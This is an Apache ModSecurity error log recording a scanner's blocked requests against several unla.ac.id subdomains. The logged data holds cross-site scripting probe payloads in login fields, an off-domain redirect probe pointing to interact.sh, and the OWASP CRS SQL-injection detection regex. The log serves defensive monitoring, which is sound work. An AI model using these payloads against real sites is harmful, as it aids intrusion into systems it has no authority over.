[Tue Aug 29 11:52:09.601558 2023] [:error] [pid 2562] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: domain)>11 found within ARGS:email: test@test.com\\x22><img src=a onerror=alert(document.domain)>11"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/seo/seopanel/login.php"] [unique_id "ZO15ecCo-f0AAAoCWEgAAAAB"]
[Tue Aug 29 11:52:09.604640 2023] [:error] [pid 2548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: domain)>11 found within ARGS:email: test@test.com\\x22><img src=a onerror=alert(document.domain)>11"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/seo/seopanel/login.php"] [unique_id "ZO15ecCo-f0AAAn0GbMAAAAa"]
[Tue Aug 29 11:52:09.608223 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: domain)>11 found within ARGS:email: test@test.com\\x22><img src=a onerror=alert(document.domain)>11"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/seo/seopanel/login.php"] [unique_id "ZO15ecCo-f0AAAn40zUAAAAW"]
[Tue Aug 29 11:52:09.621082 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15ecCo-f0AAAfWOLkAAAAL"]
[Tue Aug 29 11:52:09.633658 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: domain)>11 found within ARGS:email: test@test.com\\x22><img src=a onerror=alert(document.domain)>11"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/seo/seopanel/login.php"] [unique_id "ZO15ecCo-f0AAAnIln0AAAAV"]
[Tue Aug 29 11:52:09.685327 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15ecCo-f0AAAm7nGAAAAAE"]
[Tue Aug 29 11:52:09.701269 2023] [:error] [pid 2548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:fill. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:fill: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/checklist/images/checklist-icon.php"] [unique_id "ZO15ecCo-f0AAAn0GbQAAAAa"]
[Tue Aug 29 11:52:09.712191 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15ecCo-f0AAAnjjL0AAAAX"]
[Tue Aug 29 11:52:09.712534 2023] [:error] [pid 2152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15ecCo-f0AAAhoHUUAAAAl"]
[Tue Aug 29 11:52:09.713139 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15ecCo-f0AAAni@@wAAAAU"]
[Tue Aug 29 11:52:09.713149 2023] [:error] [pid 2562] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: domain)>11 found within ARGS:email: test@test.com\\x22><img src=a onerror=alert(document.domain)>11"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/seo/seopanel/login.php"] [unique_id "ZO15ecCo-f0AAAoCWEoAAAAB"]
[Tue Aug 29 11:52:10.592420 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: domain)>11 found within ARGS:email: test@test.com\\x22><img src=a onerror=alert(document.domain)>11"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/seo/seopanel/login.php"] [unique_id "ZO15esCo-f0AAAfWOLsAAAAL"]
[Tue Aug 29 11:52:10.593308 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15esCo-f0AAAm7nGIAAAAE"]
[Tue Aug 29 11:52:10.631068 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15esCo-f0AAAfWOLwAAAAL"]
[Tue Aug 29 11:52:10.649049 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15esCo-f0AAAni@@8AAAAU"]
[Tue Aug 29 11:52:10.677190 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15esCo-f0AAAnTlMMAAAAA"]
[Tue Aug 29 11:52:10.681583 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15esCo-f0AAAfWOL0AAAAL"]
[Tue Aug 29 11:52:11.609172 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15e8Co-f0AAAoAkvMAAAAC"]
[Tue Aug 29 11:52:11.624550 2023] [:error] [pid 2557] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:password: admin\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/fw.login.php"] [unique_id "ZO15e8Co-f0AAAn95@IAAAAD"]
[Tue Aug 29 11:52:11.650843 2023] [:error] [pid 2532] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:password: admin\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/fw.login.php"] [unique_id "ZO15e8Co-f0AAAnkwfUAAAAY"]
[Tue Aug 29 11:52:11.655552 2023] [:error] [pid 2557] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15e8Co-f0AAAn95@MAAAAD"]
[Tue Aug 29 11:52:11.659459 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:password: admin\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/fw.login.php"] [unique_id "ZO15e8Co-f0AAAjdQaQAAAAZ"]
[Tue Aug 29 11:52:11.664426 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15e8Co-f0AAAni@-MAAAAU"]
[Tue Aug 29 11:52:11.676084 2023] [:error] [pid 2548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15e8Co-f0AAAn0GbwAAAAa"]
[Tue Aug 29 11:52:11.688606 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15e8Co-f0AAAni@-QAAAAU"]
[Tue Aug 29 11:52:11.694715 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:password: admin\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/fw.login.php"] [unique_id "ZO15e8Co-f0AAAnIloQAAAAV"]
[Tue Aug 29 11:52:11.712999 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:password: admin\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/fw.login.php"] [unique_id "ZO15e8Co-f0AAAlIBj8AAAAn"]
[Tue Aug 29 11:52:12.576259 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15fMCo-f0AAAlIBkIAAAAn"]
